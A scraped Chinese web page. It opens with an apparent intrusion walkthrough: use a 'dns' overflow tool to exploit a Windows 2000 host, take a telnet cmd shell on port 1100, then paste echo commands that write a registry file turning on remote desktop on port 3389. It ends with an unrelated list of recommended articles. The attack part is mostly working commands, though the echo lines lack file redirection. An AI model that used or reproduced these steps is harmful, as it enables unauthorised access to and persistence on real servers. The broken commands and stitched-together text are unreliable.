在CMD下运行它可以看到它的使用参数等信息。执行dns -s IP命令检测目标IP是否存在DNS溢出漏洞。在图中我们可以看出目标主机存在DNS溢出漏洞,操作系统为Windows 2000!接着我们进行溢出攻击,执行dns -t 2000all IP 1207后提示要我们检测返回的1100端口的shell。telnet IP 1100成功得到返回的cmdshell,如图3。注意目录为c:\WINNT\system32,顶部也明显可以看到Windows 2000相关字样。接着我们需要做的是使用echo命令写入一个3389.reg注册表文件。将如下代码一行一行地复制到cmdshell窗口后按回车执行:

echo Windows Registry Editor Version 5.00 3389.reg

echo. 3389.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] 3389.reg

echo Enabled=0 3389.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 3389.reg

echo ShutdownWithoutLogon=0 3389.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] 3389.reg

echo EnableAdminTSRemote=dword:00000001 3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] 3389.reg

echo TSEnabled=dword:00000001 3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] 3389.reg

echo Start=dword:00000002 3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] 3389.reg

echo Start=dword:00000002 3389.reg

echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] 3389.reg

echo Hotkey=1 3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] 3389.reg

echo PortNumber=dword:00000D3D 3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] 3389.reg

echo PortNumber=dword:00000D3D 3389.reg

取消

评论

如何开启服务器2003远程,windows2003远程界面如何开启3389端口相关推荐

  1. xp系统连接服务器工具,xp系统远程连接服务器

    xp系统远程连接服务器 内容精选 换一换 华为云帮助中心,为用户提供产品简介.价格说明.购买指南.用户指南.API参考.最佳实践.常见问题.视频帮助等技术文档,帮助您快速上手使用华为云服务. 华为云帮 ...

  2. 免费内网穿透3389端口,实现外网远程桌面内网【无需公网IP】

    3389端口,是远程桌面的服务端口.我们可以通过3389端口,用Windows自带的远程桌面连接,来远程连接服务器设备,实现如同操作本地电脑一般的场景. 在同个局域网下,只需要启用"远程桌面 ...

  3. xp如何开启远程服务器,XP系统打开远程桌面与修改3389端口的操作步骤

    3389端口是Windows 2000(2003) Server远程桌面的服务端口,通过这个端口,用"远程桌面"等连接工具来连接到远程的服务器,如果连接上了,输入系统管理员的用户名 ...

  4. 服务器win2003远程桌面连接设置密码,windows2003远程桌面配置 不用每次输密码,改颜色,更改连接数等 (转)...

    Windows 2003系统的"远程桌面"实际上就是终端服务,虽然 "远程桌面"最初在Windows XP上就已经存在,但只能提供一个用户使用计算机,因此使用率 ...

  5. win服务器远程桌面怎么开,如何开启windowsserver 2008r2的远程桌面功能

    默认情况下windows server2008R2远程桌面是关闭的,如下几步即可开启: 1.打开系统属性-远程-选择"仅允许运行使用网络级别身份验证的远程桌面的计算机连接" 2.防 ...

  6. Pycharm远程连接服务器(windows下远程修改服务器代码)

    http://blog.csdn.net/duankaifei/article/details/41898641 1.写在前面     之前一致用putty,ssh,修改代码,或者本地修改,上传到服务 ...

  7. git访问远程服务器文件,git访问远程服务器文件

    git访问远程服务器文件 内容精选 换一换 当您的裸金属服务器无法SSH登录时,我们首先建议您通过控制台远程登录.SSH登录失败时,请首先尝试能否通过管理控制台远程登录裸金属服务器.登录管理控制台.选 ...

  8. 电脑怎么远程连接服务器?如何设置远程连接?

    电脑怎么远程连接服务器? 第一步在我们的电脑上面按win+R键打开运行,输入"mstsc",点击确定. 第二步进去远程桌面连接界面之后,输入要远程连接的服务器ip地址. 第三步我们 ...

  9. W10系统怎么进去服务器,w10系统怎么远程连接服务器

    w10系统怎么远程连接服务器 内容精选 换一换 本章节指导您使用MongoDB客户端和Robo 3T工具,通过公网连接单节点实例.通过MongoDB客户端和Robo 3T工具连接实例的方式有普通连接和 ...

最新文章

  1. SpringBoot解决cors跨域问题
  2. JS技巧:兼容性导出表格为Excel文件
  3. linux文件目录和属性知识,Linux文件和目录属性
  4. 热电偶单片机代码c语言,基于STC12C5A60S2单片机的恒温箱设计-LCD1602-热电偶(电路图+程序源码)...
  5. [Erlang 0097] TCP半开的几个小测试
  6. 苹果mac闪退_自从Mac有了WPS,从此和双系统说再见!
  7. USACO / Cow Pedigrees(DP)
  8. Hugging Face:成为机器学习界的“GitHub”
  9. jenkins 并发构建Android 报错:Gradle build daemon disappeared unexpectedly (it may have been killed or may
  10. 怎么查看计算机mac地址,怎么查电脑的mac地址?电脑mac地址查询方法
  11. PhotoScan软件进行无人机数据处理流程
  12. idea使用@Slf4j
  13. 【二】Centos 7.6下载与安装
  14. 天蓝色在ps中的色值_天蓝色的cosmosdb文档中的字段级加密
  15. 纳米表征技术 2022.10.5
  16. 6月30日,入职感悟、未来规划、本周工作总结,记录印象深刻的BUG。
  17. 计算机香港专业学校排名,去香港读计算机专业什么学校好
  18. php制作日历带节日实验目的,php制作日历
  19. 方法技能:使用SXEarth下载遥感影像与高程数据,并使用MapGIS10进行三维显示
  20. 最简单的命令开启cgi文件服务器

热门文章

  1. 微信小程序请求数据报错: 如若已在管理后台更新域名配置,请刷新项目配置后重新编译项目,操作路径:“详情-域名信息”
  2. klouderr什么意思_kswl是什么意思(网络用语KSWL是什么意思)
  3. APE 2D物理引擎使用
  4. 白话Elasticsearch19-深度探秘搜索技术之混合使用match和近似匹配实现召回率(recall)与精准度(precision)的平衡
  5. 上海学校心理咨询-普通心理学-考前冲刺 1.2 心理学的研究领域
  6. 信息时代的必修课:利用信息等价性原理进行信息压缩
  7. python读取windows日志_Python取证技术(3): Windows 事件日志分析
  8. ❀工信工实验参考——《大物5.8A声波反射衍射干涉》
  9. 自动执行一个php文件,使用crontab自动执行php文件
  10. java双引号嵌套_java和javascript双引号嵌套的问题